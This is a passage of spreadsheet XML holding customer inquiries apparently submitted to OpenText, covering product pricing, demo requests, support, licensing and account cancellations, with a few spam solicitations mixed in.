Hello Team,_x000D_
_x000D_
We are looking for training options for below products from CCM product suite._x000D_
_x000D_
- OpenText Exstream_x000D_
- OpenText Empower _x000D_
- OpenText Liquid Office_x000D_
_x000D_
Can you please provide us both the options of classroom (in Pune or anywhere else in India) and virtual training? _x000D_
_x000D_
Provide us how much it will cost and what are the dates available or when it can happen? _x000D_
_x000D_
_x000D_
Thanks and Regards,_x000D_
Chetan Chaudhari_x000D_
IBM India Pvt. Ltd.</t>
  </si>
  <si>
    <t>医药仙丹力量</t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
I am currently evaluating different solutions for a Document Management System. I am previously acquainted with "Documentum D2", but would like to know if you offer other solutions for document management (I work within the pharmaceutical and medtech business)._x000D_
_x000D_
Please add any information sheets with information on the systems you have. _x000D_
_x000D_
Sincere regards_x000D_
Joel</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
My Name is Nayan Goswami, I'm selling contextual Links/Articles/Banners on Casino, Poker, Bingo, Sports and various other niche sites at very reasonable prices. _x000D_
_x000D_
All my sites have PR1+, DA30+, Google Indexing 50+ and different C-Class IPs. _x000D_
_x000D_
So, if you are interested to buy links please contact me. You can also pass my contact with your colleagues if they are interested or you can share some contacts with me too. _x000D_
_x000D_
I'm waiting for your response. _x000D_
_x000D_
Regards,_x000D_
Nayan</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Please provide the Price for  Right fax Server and software. _x000D_
_x000D_
Regards_x000D_
Rakhi </t>
  </si>
  <si>
    <t>Document Management Software Enquiry</t>
  </si>
  <si>
    <t>Could you send me your price list for e-faxing. The company doesxabout 200 faces a week. How much would your service be for 200 a week and what if you have more than that?</t>
  </si>
  <si>
    <t xml:space="preserve">Needing installer for OpenText Exstream 16.4 in order to evaluate the application so that it may be entered into the Wells Fargo environment. _x000D_
</t>
  </si>
  <si>
    <t>Need Archiving solutions document</t>
  </si>
  <si>
    <t>Hi, I'm wanting to know how I can access my Hightail account? Do I need to sign up again or is there a cross over? Thanks...</t>
  </si>
  <si>
    <t xml:space="preserve">i need qoutation for DOCUMENTUM QMS   FOR PHARMA    WITH INFORMATION ON OOTHER APPS U HAVE   USER NUMBER 25 USER  CLOUD </t>
  </si>
  <si>
    <t xml:space="preserve">Sponsorship opportunity </t>
  </si>
  <si>
    <t>Want information on cloud fax solution, including pricing.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/ Madam_x000D_
_x000D_
I am a consulting firm looking at the below product pricings and training on the same:_x000D_
_x000D_
Encase  Mobile forensic  2 in quantity._x000D_
_x000D_
Awaiting to hear from you._x000D_
_x000D_
Please feel free to contact me aliya@camberwellconsulting.com._x000D_
_x000D_
Many Thanks._x000D_
Aliya_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I need to cancel my fax at this time and no sure how to go about doing it.  I am no longer using a fax.  Thanks </t>
  </si>
  <si>
    <t>We require training for our staff on Opentext</t>
  </si>
  <si>
    <t>Interested in demo</t>
  </si>
  <si>
    <t>Please cancel my monthly subscription.</t>
  </si>
  <si>
    <t>Dear Opentext _x000D_
The Texas Cyber Summit is looking for sponsors, please visit TexasCyberSummit org for more details_x000D_
Thank you_x000D_
Joseph</t>
  </si>
  <si>
    <t>I need Brava Tech Pro  assistance to install  Brava software 1772-SX-M on my desktop computer! Ticket # 3947687! Call Cliff Paramore 301-257-8155</t>
  </si>
  <si>
    <t>I am working as ECM Team Leader in one of the main ECM solution providers in Middle East. Currently we are working on Correspondence System that is working only on IBM FileNet Content Manager and Process Manager . We have a serious future plan to support OpenText as ECM Platform , so I was wondering if I could get VM or Installation Package with Installation Guides to be able to  guide my team about the features and development skills that are needed to port our solution on OpenText</t>
  </si>
  <si>
    <t>Hi guys!_x000D_
_x000D_
At Apex America we're looking for a Workforce Management Software and we'd love to test your solution. Could you please contact me to arrange a demo?_x000D_
_x000D_
Looking forward to your answer._x000D_
_x000D_
Cefe.-</t>
  </si>
  <si>
    <t>HELLO I BOUGHT BRAVA DESKTOP , GOT THE INSTRUCTION EMAIL, CANT GET PASS MY SUPPORT, SO I CANT INSTALL THE PRODUCT.</t>
  </si>
  <si>
    <t>EDI solution</t>
  </si>
  <si>
    <t>Re: Website Issues...?_x000D_
_x000D_
Hello,_x000D_
_x000D_
My Name is Kelly and I am a Digital Marketing Specialists for a Creative Agency._x000D_
_x000D_
I was doing some industry benchmarking for a client of mine when I came across your website._x000D_
_x000D_
I noticed a few technical errors which correspond with a drop of website traffic over the last 6-8 months which I thought I would bring to your attention._x000D_
_x000D_
After closer inspection it appears your site is lacking in 4 key criteria._x000D_
_x000D_
1- Website Speed_x000D_
2- Link Diversity_x000D_
3- Domain Authority_x000D_
4- Competition Comparison_x000D_
_x000D_
I would love the chance to help as well however; this report will at least give you a gauge on the quality of what I do.  If you are interested then please share your requirement and contact details._x000D_
_x000D_
In order for us to respond to your request for information, please include your Name, company’s website address (mandatory) and /or phone number_x000D_
 _x000D_
Sincerely,_x000D_
Kelly Scott_x000D_
kellyinternetmarketing4@gmail.com</t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
We cordially welcome you to collaborate (Exhibitor/Sponsor) with us as for our upcoming conference "13th International Conference on Structural and Molecular Biology: Techniques and Market Analysis" is scheduled in October 22-23, 2018 at Ottawa, Canada. The conference will be focusing on ‘Introducing New Ventures and Trends in Structural and Molecular Biology’._x000D_
We came across your company's website while searching for conference partnership with eminent companies._x000D_
One can avail Speaker/Delegate/Sponsor/Exhibitor slots</t>
  </si>
  <si>
    <t>Chat</t>
  </si>
  <si>
    <t>Black Diamond is a startup biotech doing drug discovery research and clinical development. We are looking for a records management system which allows records archival (and backup), inventory, retrieval and is user-friendly. The solution should be appropriate for the business and size of the organization.  I am interested to find more what OpenText can offer and get a budgetary quote._x000D_
Thanks,_x000D_
Deborah Chen</t>
  </si>
  <si>
    <t>Having a issue to know the diffirence between two technical Input Accel Dispatcher models</t>
  </si>
  <si>
    <t>Hello,_x000D_
My company is look at Documentum as a solution for document containment.  We are a contract research organization in the life sciences field and deal with a lot of document pertaining to GMP manufacturing.  I would love to set up a time next week to talk about the solution and learn more about it. _x000D_
_x000D_
Thank you,_x000D_
Michael Shoen</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to inquire regarding your OpenText™ Workflow Server, or similar solution for managing document workflows. To begin with, I would like to know if this product is available on premise or/and in the cloud, and general information around licensing and your cost model (or cost range)._x000D_
_x000D_
Thank you_x000D_
Claude Valin_x000D_
</t>
  </si>
  <si>
    <t>Took DF120, looking for a way to access a digital certificate of completion for CEUs</t>
  </si>
  <si>
    <t>none of the email addresses nor passwords that I have saved in my password saver - Dashlane work to log in.  I need to change my VISA card number bc the present one was comprised and issued.  This card is used to pay the Daimler ASN's and Invoices.</t>
  </si>
  <si>
    <t>to recieve encripted messages</t>
  </si>
  <si>
    <t>To have access to mysupport.</t>
  </si>
  <si>
    <t>Stark County Ohio Government would like to pursue the Engineering and Design of an Enterprise Fax Server for the county. We have about 250 physical Fax machines that we would like to replace with a Server Array. We would like Engineering Assistance Prior to selecting our Partner via the Ohio State Term Pricing Schedule.</t>
  </si>
  <si>
    <t>I wanted to get an idea how much you charge for e-faxes. What are your rates and can you send me a price scale with various prices based on the number of faxes sent._x000D_
Thanks</t>
  </si>
  <si>
    <t>Questions about product features and implementation to other web systems</t>
  </si>
  <si>
    <t>Requesting a call back for pricing on RightFax hosted managed services. Currently have a RightFax inhouse server.</t>
  </si>
  <si>
    <t>PLEASE have someone reply regarding case# 1-3387067260 on account 852851.  I have been asking for a response for over two weeks.  I can't pay invoices until someone gets back to me.</t>
  </si>
  <si>
    <t>We recently received a copy of your invoice #1808861076 for payment processing; however, we need a copy of your W9 form before we can process this request for payment.  Can you please email me a copy of your W9?</t>
  </si>
  <si>
    <t>Hello_x000D_
My account has been restricted to mysupport_x000D_
I need to access to all download and documentation resources_x000D_
Thx in advance</t>
  </si>
  <si>
    <t>The Special Purpose Processor Development Group at Mayo Clinic is looking for a replacement for our aging Oracle Content Server. I would like to speak to someone to determine if any of OpenText's products would be a fit for us.</t>
  </si>
  <si>
    <t>Hi, I would like to have access to technical support for the NFS Server (Open Text NFS Solo) product.  Thanks!</t>
  </si>
  <si>
    <t>I have a customer that has Documentum IRM  - wants to possibly add to another department. Would like demo to go over new features, how to license etc to see if this would be a fit to expand.  Customer is in Utah</t>
  </si>
  <si>
    <t xml:space="preserve">My customer Lightstream has asked us to provide a renewal quote for their support_x000D_
_x000D_
_x000D_
1)	RightFax Express Analog (4 Channels) Maintenance  06/01/18 to 05/31/19 1000019483 (S-CPFA211KIT_M)QTY 1_x000D_
Unique #: 72146-12209 Unique Name: 72146-12209_x000D_
Serial #: DT2232763_x000D_
_x000D_
_x000D_
2)	RightFax Express Analog (4 Channels) Maintenance 06/01/18 to 05/31/19 1000019483 (S-CPFA211KIT_M)QTY 1_x000D_
Unique #: 74376-12282 Unique Name: 74376-12282_x000D_
Serial #: DT2232762_x000D_
</t>
  </si>
  <si>
    <t>Khasani wants to be an OpenText partner</t>
  </si>
  <si>
    <t>we need the latest version of right fax as we are rolling out windows 10 with offic 2016 and running into install issues.</t>
  </si>
  <si>
    <t xml:space="preserve">This is BJ from Lennox International and an open Text customer since 2001. I am working on some changes in OpenText scanner setting to convert PDF when scanned. Currently it is set to default to create TIFF._x000D_
So I need  the installation and configuration guide for “Enterprise scan” where I need to change our current setting to achieve this._x000D_
Could you please share and help me the sending configuration guide for enterprise scan and how to connect to SAP and setting required for that._x000D_
</t>
  </si>
  <si>
    <t>Hi guys Looking for where to buy old iPhones.I've seen a commercial somewhere but I can't find it again.</t>
  </si>
  <si>
    <t>Looking for Document Management Solution</t>
  </si>
  <si>
    <t>Доброго времени! Вы все еще не можете продвинуть свой сайт с места и начать зарабатывать хорошие деньги? Хочу Вам предложить свою услугу по продвижению вашего сайта или интернет-магазина в ТОП-10 выдачи поисковых систем. _x000D_
 _x000D_
Детальнее узнайте по почте proxrum==@==mail.ru (удалите плз знаки =) _x000D_
Отпишите письмо с темой "ПРОДВИЖЕНИЕ САЙТОВ В ПОИСКОВИКАХ" и я Вам помогу. Стоимость продвижения в два раза дешевле СЕО-фирм!</t>
  </si>
  <si>
    <t>I'm an IT Infrastructure Administrator passionate about ICT Cyber Security/Penetration Testing &amp; SAP and would like to join your company on a voluntary base as a junior ICT Cyber Security Engineer/ SAP (Trainee) to help gain new skill set and be practically exposed. _x000D_
_x000D_
I completed (CASP) CompTIA Advanced Security Practitioner, SAP SolMan, ICDL certificates and would be completing my IT Diploma with UNISA in 2019. I am currently doing self-study on CISSP &amp; looking for a more challenging opportunity that would help me put my acquired IT Security Certificate into good use._x000D_
I am people-oriented person, Self-motivated, willing and able to work to a deadline. Works well within a team &amp; easily assume team identity. I'm open to new ideas &amp; willing to learn from others_x000D_
_x000D_
I would appreciate the opportunity to discuss my qualifications further in greater details with you in person at your earliest convenience.</t>
  </si>
  <si>
    <t>We need to obtain a software solution to manage all the data related with the production allocation (Oil, Water and Gas) by the wells, fields, partners and blocks; to monitor the stocks in the terminals Palanca (FSO) and Gimboa FPSO); to manage all data related with the offloading in Palanca and Gimboa and to manage all data related with the production sharing agreement between the operator, associates and concessionaire (government). _x000D_
_x000D_
The main goal of this tender is to evaluate the best proposal to obtain the software solution to manage and to monitor the production data for Block 3/05 and Block 4/05 (Allocation, Lifting, Stock Position and PSA), providing reports and tools to support all control and decision making._x000D_
_x000D_
Allocation (Production data allocation - Oil, Water and Gas)_x000D_
Lifting (offloading)_x000D_
Stock Position (Production Fiscalized)_x000D_
PSA (Production sharing agreement between operators, associates and concessionaire –_x000D_
                    government)._x000D_
Production Online (Monitor/Evaluate oil production data with interval minimum 1 hour)_x000D_
Monitoring of process metrics (Monitor pressure and temperatures on separators,_x000D_
        pipelines and well heads)_x000D_
_x000D_
PPM’s monitoring (Monitor water quality launched to the sea)_x000D_
Chemicals monitoring (Monitor chemicals consumption to obtain performance _x000D_
                                indicators KPI’s, example: chemical cost/bbl)_x000D_
Equipments Monitoring (Monitor the equipment’s status: working, broken e standby)_x000D_
           The software solution must contain the necessary functionalities to respond to any_x000D_
            request from users according to the standard, format and requirements of Sonangol P &amp;_x000D_
            P, specially:_x000D_
Providing all reports required by Sonangol P &amp; P;_x000D_
Providing analysis tools to support decision making;_x000D_
Dashboard tools;_x000D_
E-mailing;_x000D_
Exporting data_x000D_
Audit process facilities offshore;_x000D_
Identification functional and technical requirements;_x000D_
Identification curre</t>
  </si>
  <si>
    <t xml:space="preserve">I do challenging work </t>
  </si>
  <si>
    <t xml:space="preserve">we would require solution on Right fax Server and software. </t>
  </si>
  <si>
    <t>When will the "Best practices in upgrading OpenText Exstream" webex be available on the recorded webinar website ?_x000D_
_x000D_
Regards_x000D_
_x000D_
Gareth</t>
  </si>
  <si>
    <t xml:space="preserve">I want to know about current opening for freshers </t>
  </si>
  <si>
    <t>i do not want a loan do not put any money in my checking account</t>
  </si>
  <si>
    <t>I do not want a loan do not contact me again or put any money in my bank account!!</t>
  </si>
  <si>
    <t>I need Exstream dialogue 8.5 / 9 / 9.5 for learning (personal)  purpose. Do let me know what will be the nominal cost to purchase it.</t>
  </si>
  <si>
    <t>My Hightail account_x000D_
How do I access my hightail account?</t>
  </si>
  <si>
    <t>Request demo for DMS functionality and pricing</t>
  </si>
  <si>
    <t>My own Voon Wun Sing clarified that my goal is party food delivery service. What I need is a web page center for customers and customers to make it easy for customers to order the party food they need. When I tested the webpage staff many times, I had a problem. 1, is my personal language problem. 2, I am worried that I made a mistake when filling out the application form. 3. There is no way to update the information in my Google deposit account. I am already processing it. So I want to be sorry for the support from your company from all over the world. I am already solving all the problems. Why is this party food page important to me? Yes. It is very important to me because I found that there is no such service on the Internet. So I believe that modern technology can do it. The most important part of the party food page I want comes from the web design team, who helped me design the food platform, and this is to help the restaurant help the hotel, helping the truck to match the order of the restaurant to the location requested by the customer. Party Food is a menu for upgrading restaurants, which is also provided by consumers who need party food, and is a job that can be prepared for some poor, disaster areas, nursing homes, orphanages, etc. How can I help them get food? Because on this food platform, consumers can order their own party food, and they can also order food for others. This is because donating food to others. This food page can apply for a friend form for donated food. At the same time, it is also clearly informed by the donated food, allowing consumers to freely order food for others. Payment is due to the party food merchants. I have misunderstood because of language. I ask your company to forgive my personal knowledge. If you want to know more about my own professional professors, I would be happy to contact you. I hope that I can learn more and suggest this piece of information._x000D_
I am very worried about the partners who are waiting for my informat</t>
  </si>
  <si>
    <t>How do I delete my account?  I signed up by mistake.</t>
  </si>
  <si>
    <t>Pricing for eDOCS DM extensions for Sharepoint</t>
  </si>
  <si>
    <t>I wish you a good day..I'm a licensed customer of Encase software. Do you have quality script files we can use at Encase? The script files at the Encase Application Center did not work for us. Do you have custom scripts for export? if you are very happy to send..</t>
  </si>
  <si>
    <t>How many licenses have been purchased by Hargrove for Imagination (OpenText)?_x000D_
 Are these single-user or network and are they under maintenance? What is the maintenance expiration date? I left a message for Shane.</t>
  </si>
  <si>
    <t>Our company has acquired numbers from a current customer of yours, formerly EasyLink.  Your current customer is WESTROCK.   How can I get an account setup to transfer numbers from a WESTROCK account to a new account managed by Rubicon.</t>
  </si>
  <si>
    <t>We need to update our Fax Service (Fax2Mail) to be able to send out faxes._x000D_
Our client ID is 781104</t>
  </si>
  <si>
    <t xml:space="preserve">The Texas Department of Motor of Vehicles Contract is expiring 08/31/2018. We need to renew our contract. Please contact me._x000D_
_x000D_
End user codes: _x000D_
EU00132762_x000D_
EU00132765_x000D_
_x000D_
version=10.6_x000D_
SUID - 54216-12271_x000D_
</t>
  </si>
  <si>
    <t>I need a quote for ten (10) new licenses of EnCase Forensic Edition.  I will need the Encryption Suite and Physical Disk Emulator functionality included (I don't know if you market them separately, or if they are included by default now).  Please send the quote to durden_marcus@bah.com.  Thanks!</t>
  </si>
  <si>
    <t>ARE YOU STILL ACCEPTING PAYMENTS TO EASYLINK, OR DO WE NEED TO UPDATE OUR RECORDS SO CHECKS ARE CUT TO OPENTEXT? IF SO, PLEASE SEND AN UPATED W-9. THANK YOU.</t>
  </si>
  <si>
    <t xml:space="preserve">Team,_x000D_
_x000D_
Please provide federal/reseller pricing for the following renewal:_x000D_
_x000D_
End User: Dept. of Navy, Medicine and Surgery_x000D_
Pop: 10/1/2018 to 09/30/2019_x000D_
Legacy Standard Care Support 9 x 5 Direct Support Open Text - QTY1_x000D_
Process Automation eForms Software EN23930 Open Text - QTY 2_x000D_
TeleForm Verifier Module Software EN701914 (12 Additional Verifiers open Text) - QTY 12_x000D_
TeleForm Enterprise Suite Software EN701914 Open Text - QTY 1_x000D_
TeleForm Reader Module Software EN701914 (5 Additional Readers Open Text) - QTY 5_x000D_
TeleForm Designer Module Software EN701914 (5 Additional Designer Open Text) - QTY 5_x000D_
TeleForm Scan Station Module Software EN701914 (5 Additional Scan Station) - QTY 5_x000D_
_x000D_
Thanks!_x000D_
_x000D_
Kris Valdez_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Healthcare direct_x000D_
</t>
  </si>
  <si>
    <t>Conhecer o produto. Necessidades em ECM, BPMN</t>
  </si>
  <si>
    <t>A suggestion for buying out. MTBC. In my opinion, it would fit very well.</t>
  </si>
  <si>
    <t>We have a need to open old Legato ReportExtender files.  Will software from Opentext do that?</t>
  </si>
  <si>
    <t xml:space="preserve">We have purchased tableau hardware though you in the past and I need to know if it is possible that you can quote some upgrades to what we have.  If so that would be great as going to one of the resalers directly means I have to go out to bid._x000D_
_x000D_
Looking for a forensice tableau kit that contains the following. hoping that you have a general large kit that we can purchase._x000D_
_x000D_
Tableau Forensic USB 3.0 Bridge - T8U_x000D_
Tableau Forensic PCIE Bridge - T7U_x000D_
Tableau Forensic SAS Bridge - T6U_x000D_
Tableau Forensic SATA / IDE Bridge - T35U_x000D_
Tableau PCIE Adapter - TC-PCIE-4_x000D_
Tableau PCIE Adapter for Apple SSD - TDA7-3 _x000D_
Tableau PCIE M.2 SSD - TDA7-2_x000D_
Tableaue PCIE Card SSD - TDA7-1_x000D_
Tableau Micro-Sata SSD Drive Adapter - TDA3-1_x000D_
Tableau Apple Blade-Type SSD Drive Adapter - TDA3-2_x000D_
Tableau SATA LIF Drive Adapter - TDA3-LIF_x000D_
Media Card Reader USB 3.0 Read/Write_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, we are interested in doing a demo of your document management tool. Please let us know when we can see one. Thank you! </t>
  </si>
  <si>
    <t>We are interested in adquire 30 to 50 Brava licensing for Documentum.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to obtain contact information for new potential computer forensic experts in or near Reno NV. Ive had very little success doing so by simply googling for information. Perhaps you could could provide me with the names of a few encase qualified experts in my area. Thanks for any assistance you can provide. </t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning, _x000D_
_x000D_
_x000D_
I noticed that OPENTEXT uses the short code 30939 to allow others to connect through text messaging. I’m not sure who your current provider is, however would you be interested in better pricing, more reliable service, top notch 24/7 365 live emergency tech support, etc.? Pricing as low as $0.002/text in the U.S. with CDYNE.. _x000D_
_x000D_
If you are interested in saving some money and getting far more valuable and reliable service, please let me know… I am confident that we can offer you a lower price point for a better product._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thank you,_x000D_
Ronald Niles_x000D_
Account Executive_x000D_
CDYNE Corporation_x000D_
Business Telephone: 757-544-9510 Ext 3153_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I need access to the support area to update billing information regarding the credit card for recurring payments.</t>
  </si>
  <si>
    <t>Need information on part numbers</t>
  </si>
  <si>
    <t>Please cancel my subscription</t>
  </si>
  <si>
    <t>Dear support, _x000D_
We would like to resell the Opentext products to our key Customer. Please provide me the information how we can buy your products in Russia (Moscow). And it will be exellent to receive the contact of Opentext representative to discuss our deal. Thank you in advance!</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a fax solution, load is approximately 4000/4000 in/out pages per month, or more. </t>
  </si>
  <si>
    <t xml:space="preserve">User is not able to see attachments in incoming FAX's from a sender. Details below: _x000D_
_x000D_
You have received a document._x000D_
_x000D_
Sender's Name:	8884789621_x000D_
Sender's Caller ID:	18884789621_x000D_
Date/Time:	August 22, 2018 11:58:10 AM EDT_x000D_
Number of Pages:	2_x000D_
_x000D_
To reprocess this document, click here. _x000D_
To stop receiving calls from this number, click here. _x000D_
 _x000D_
_x000D_
Click for details : http://KIKCONSDP01:8080/WorkOrder.do?woMode=viewWO&amp;woID=37277_x000D_
</t>
  </si>
  <si>
    <t>We have set OpenText up as an EFT payment and need an email address to send remittances to.  Please supply email.</t>
  </si>
  <si>
    <t>This is Renee from ThreeBond Inc. We are manufacturing company and we are very interested in the EDI solution your company provides. We currently mainly cooperated with FCA, GM and Nissan. Could you please send me more information about your company? Also I'd really like to know what kind of EDI solution your company provides? (Web-based will be a plus.) Thank you very much!_x000D_
_x000D_
Regards,_x000D_
Renee</t>
  </si>
  <si>
    <t>To request for a consideration to have me as one of your employees.I can telecommute from my current country for any position that you are willing to offer to me.</t>
  </si>
  <si>
    <t xml:space="preserve">I sent previous week questions and request to contact with me._x000D_
Please, Can you send us more details about your product:_x000D_
1.	work with html 5 and pack &amp; send  as PDF _x000D_
2.	Support for RTL and HEBREW_x000D_
3.	Accessibility on templates_x000D_
4.	Combination between On-premises and cloud solution </t>
  </si>
  <si>
    <t xml:space="preserve">i sent previous week questions and request to contact with me _x000D_
Please, Can you send us more details about your product:_x000D_
1.	work with html 5 and pack &amp; send  as PDF _x000D_
2.	Support for RTL and HEBREW_x000D_
3.	Accessibility on templates_x000D_
4.	Combination between On-premises and cloud solution </t>
  </si>
  <si>
    <t>Dear sir or madam,_x000D_
_x000D_
As an international software reselling company with a centralized purchasing organization for European subsidiaries, we have been approached by one of our commercial customers from France upon the following product:_x000D_
_x000D_
1x "OpenText Exceed New License ESD - Level 100-200" New License incl. Mainntenance._x000D_
_x000D_
- Is the license perpetual or a subscription license?_x000D_
- Is a Maintenance optional or mandatory?_x000D_
_x000D_
Requesting purchasing organization: _x000D_
_x000D_
COMPAREX France S.A.S. _x000D_
Éco Park_x000D_
36 rue de la Princesse_x000D_
78430 Louveciennes_x000D_
France_x000D_
_x000D_
We are kindly asking you for a quotation upon the above product._x000D_
_x000D_
Best regards,_x000D_
Josephin Müller</t>
  </si>
  <si>
    <t>I am not able to take remote session for any servers using open text socks from my KVM.</t>
  </si>
  <si>
    <t xml:space="preserve">We want to know that Reycom Document Solution (RDS) is the only partner for HPX in Indonesia?_x000D_
If not, can you mention other partner in Indonesia. </t>
  </si>
  <si>
    <t>Ladies and gentlemen,_x000D_
_x000D_
please let us have your best price for the Microsoft SharePoint Connector for Web Site Management._x000D_
_x000D_
Thank you,_x000D_
Stefanie Krüger</t>
  </si>
  <si>
    <t>We are interested in archiving solutions for SAP HANA S/4</t>
  </si>
  <si>
    <t>Interested in your company job openings</t>
  </si>
  <si>
    <t>Hi, we are currently investigating various options to replace our legacy LDSS lexmark suite of products. We use the forms designer and data transforms and ultimately use the document provider from the same suite to send the final document/form or lable with the correct formatting to the printing queues, also embedding any headers for printers to understand. I have been researching and looking into your Output transformation server and was wondering if it can indeed take a string or post-script message as input, transform it as per our templates provided and then pass it on to a printing queue or third party printing services. This is not procurement and just investigation stage, but any information you have that helps compare your products to Lexmark document solutions suite will be great value to the final outcome of this research and help us understand if your solution can indeed work for the transforms and cater for templates such as patient labels which uses special stationary or printer trays etc. Thanks.</t>
  </si>
  <si>
    <t>Hi , here is helpdesk support from TNTHK, I would like to ask for the open text viewer for windows 10 1709. could you please advise where the download link for it.</t>
  </si>
  <si>
    <t>Problem with EMail Management Client Version 16.4: EVERY TIME when Opening Outlook it says in german: "Der EMail Management Client hat die Konfigurationseinstellungen vom Server angefordert. Bitte starten Sie Outlook neu, um die Initialisierung abzuschließen."_x000D_
_x000D_
Please help us - we need a solution._x000D_
_x000D_
Best regards_x000D_
Matthias Schmidt</t>
  </si>
  <si>
    <t xml:space="preserve">Hello team,_x000D_
We need to integrate Open Text with our Success factors solutions like Employee Central. I need your help to provide me with the steps or documentation (link) which will guide us in  building Open Text integration with success factors. Also let us know if there is a costing involved._x000D_
</t>
  </si>
  <si>
    <t>I was a Hightail subscriber, but ever since it became Opentext, i have been unable to logon to my account to retrieve my subscription receipts.  Pls help, I need these receipts to complete my claims.</t>
  </si>
  <si>
    <t>Hi We are currently, doing a POC with Opentext Analytics suite, however we have got the I-Hub server as a 45 day trail version, If we want to go to commercial and enterprise version for I-Hub Server, what would be the generic pricing/cost model?</t>
  </si>
  <si>
    <t xml:space="preserve">Inquiry about progress of cheking payment_x000D_
_x000D_
_x000D_
_x000D_
Hello,_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I finished the payment for EnCE test like the payment breakdown below._x000D_
_x000D_
But until now, I have not had any response from opentext yet, so I wanna know _x000D_
_x000D_
if I finish the payment for the test accurately, when the payment will be handled and when I can take test phase I_x000D_
_x000D_
And if my payment goes wrong, please let me know how to proceed next step._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thank you._x000D_
_x000D_
_x000D_
----------------------------------------_x000D_
_x000D_
Payment Confirmation_x000D_
_x000D_
_x000D_
_x000D_
We have received the following Payment from YONGGEE JEONG_x000D_
_x000D_
_x000D_
Payment Reference Number:AP0CF7811459_x000D_
Auth Code:521041_x000D_
Payment Date:06 Aug 2018 05:02:23_x000D_
Total Payment Amount:300.00 USD_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Payment Breakdown_x000D_
 _x000D_
   _x000D_
154120-1 300.00 USD _x000D_
</t>
  </si>
  <si>
    <t>Hi, _x000D_
I am looking forward to attend training and then take up the exam for OpenText Business Consultant program. Can you please help me with the details and my preferred location for training would be USA. _x000D_
Thank you,</t>
  </si>
  <si>
    <t>I have a charge on my credit card for $1.04 from you. Who are you? What is the charge for?</t>
  </si>
  <si>
    <t>Please delete my account immediately. Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Could you please contact me regarding the services you offer.  I need help growing my company. </t>
  </si>
  <si>
    <t xml:space="preserve">I would like to access OpenText 16.4 product documentation.  Im working with our service partner to upgrade DCTM7.1 to Opentext 16.4. Trying to understand how product works and platform support matrix, installation / hardware recommendation, etc. </t>
  </si>
  <si>
    <t>Need an online solution to faxing across Windows and IOS systems so I can receive faxes. I also need a fax number to receive those faxes.</t>
  </si>
  <si>
    <t>I want to get a occ license and some testing pages for an OCC demo to a potential client. I have trouble opening a license ticket.</t>
  </si>
  <si>
    <t>Need assistance and CSR to port out one number from EasyLink to a different carrier. I would need the bill and/or account number for this DID 831-475-5693. Customer is no longer with the company. Thank you...</t>
  </si>
  <si>
    <t>Hello we are interested in the Right Fax appliance, We send alot of faxes from your EMR solution.  Thank you</t>
  </si>
  <si>
    <t>looking for A/P automated invoice processing in Avante</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in learning more about a DAM solution to replace our current one. We are an advertising agency with diverse clients and various usage needs. Primary needs are version control, file conversion, print/digital workflow, rights management, sharing assets securely internally as well as to external clients and/or vendors. </t>
  </si>
  <si>
    <t>We are looking to implement a project management system for our creative team. I would like to have a Q&amp;A session with a representative and a live demo as well. Thanks!</t>
  </si>
  <si>
    <t>Hello Sales,_x000D_
We are looking to purchase some units of the items below:_x000D_
_x000D_
Cisco WS-C2960X-24PS-L_x000D_
_x000D_
Payment Terms: 15 Days Net Terms_x000D_
_x000D_
David Mark_x000D_
Director of Procurement Services_x000D_
Texas A&amp;M International University _x000D_
5201 University Boulevard _x000D_
Laredo, TX 78041_x000D_
Tel: (956) 857-3201_x000D_
Fax: (956) 999-8461</t>
  </si>
  <si>
    <t>Which introductory course do you all have for end-users who use WebTop 6.8.1?</t>
  </si>
  <si>
    <t xml:space="preserve">can you please have the rep that supports the below account call me please_x000D_
JOHN STROGER HOSPITAL _x000D_
_x000D_
1901 W HARRISON ST _x000D_
CHICAGO, IL 60612-3714 </t>
  </si>
  <si>
    <t xml:space="preserve">Explore LOE and cost for transitioning our Standards department and hundreds of corporate representatives to a new platform that supports the development of ANSI and ISO standards. </t>
  </si>
  <si>
    <t>Researching document management system options (small firm--11 attorneys)</t>
  </si>
  <si>
    <t>Boa tarde,_x000D_
_x000D_
Estamos desenvolvendo um sistema junto a EMBRAER e necessitamos realizar a contratação de alguns sistemas para utilização nesses sistemas._x000D_
_x000D_
Solicito a cotação para utilização no ambiente abaixo dos softwares Dynamic Delivery Services (DDS) - comercializado junto com o X-Hive e o Console Administrativo._x000D_
_x000D_
Os softwares serão instalados em 2 servidores com 8 núcleos físicos cada._x000D_
_x000D_
Obrigado.</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in discussing options for the Document Management system implementation.  </t>
  </si>
  <si>
    <t>I cannot login to your website to download products I own (Captiva, Documentum). I tried to reset the password for my account (epaz@lacera.com), and when clicking the link from the email I receive, I entered the new password and receive a "Password update error"_x000D_
_x000D_
Please provide me some assistance. Thank you!_x000D_
_x000D_
Eddie Paz</t>
  </si>
  <si>
    <t>Hi,  Currently we have ExceedSS14 (OpenText Exceed/Secure Shell 14) and need to upgrade to version 15 for Windows 10 so can you please let me know How I upgrade this to new version and test in Windows 10._x000D_
_x000D_
Thanks,_x000D_
Sandip</t>
  </si>
  <si>
    <t>Dear all,_x000D_
_x000D_
We a Romanian IT reseller company, Authorized Dell and HP partners._x000D_
One of our customers in banking wants to purchase the Captiva solution._x000D_
Can you help us?_x000D_
_x000D_
Best regards,</t>
  </si>
  <si>
    <t>We are currently using rightfax client 2016 but noticed it doesn't work with windows 10 office 2016</t>
  </si>
  <si>
